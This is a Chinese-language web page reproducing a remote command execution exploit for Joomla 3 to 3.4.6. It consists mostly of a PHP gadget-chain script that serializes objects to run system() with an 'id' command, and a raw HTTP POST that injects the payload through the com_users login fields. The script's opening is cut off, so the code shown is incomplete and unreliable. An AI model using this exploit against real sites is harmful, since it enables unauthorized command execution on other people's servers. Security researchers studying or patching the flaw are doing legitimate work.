002-Joomla 3-3.4.6 远程命令执行漏洞

# Joomla 3-3.4.6 远程命令执行漏洞

### 一、漏洞简介

### 二、漏洞影响

Joomla 3-3.4.6

PHP < 5.6.13 ### 三、复现过程 ```php feed_url = $feed_url;
$this->cache = $cache;
$this->sanitize = $sanitize;
$this->cache_name_function = $cache_name_function;
}
}

class JDatabaseDriverMysqli
{
protected $obj;
protected $connection;
protected $disconnectHandlers = array();

public function __construct($obj, $connection, $disconnectHandlers)
{
$this->obj = $obj;
$this->connection = $connection;
$this->disconnectHandlers = $disconnectHandlers;
}
}

$function = ‘system’;
$argument = ‘http://www.0-sec.org;id’;

// $function = ‘assert’;
// $argument = ‘phpinfo() || “http://www.0-sec.org”‘;
$simplepie = new SimplePie($argument, true, new JDatabaseDriverMysql(), $function);
$jdatabasedrivermysqli = new JDatabaseDriverMysqli(new JSimplepieFactory(), true, array(array($simplepie,’init’)));
echo urlencode(serialize($jdatabasedrivermysqli));

?>
“`

“`bash
POST /Joomla/ HTTP/1.1
Host: www.0-sec.org:8000
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie: XDEBUG_SESSION=PHPSTORM; 17511585a4996c48455fa590ab8d4d24=58c7q9ocb6n3q0tjj7m0s3g3i6
Content-Length: 737

CSRF-Token值=1&task=user.login&option=com_users&username=\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0&password=AAA”;s:3:”233″:序列化payload
“`

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容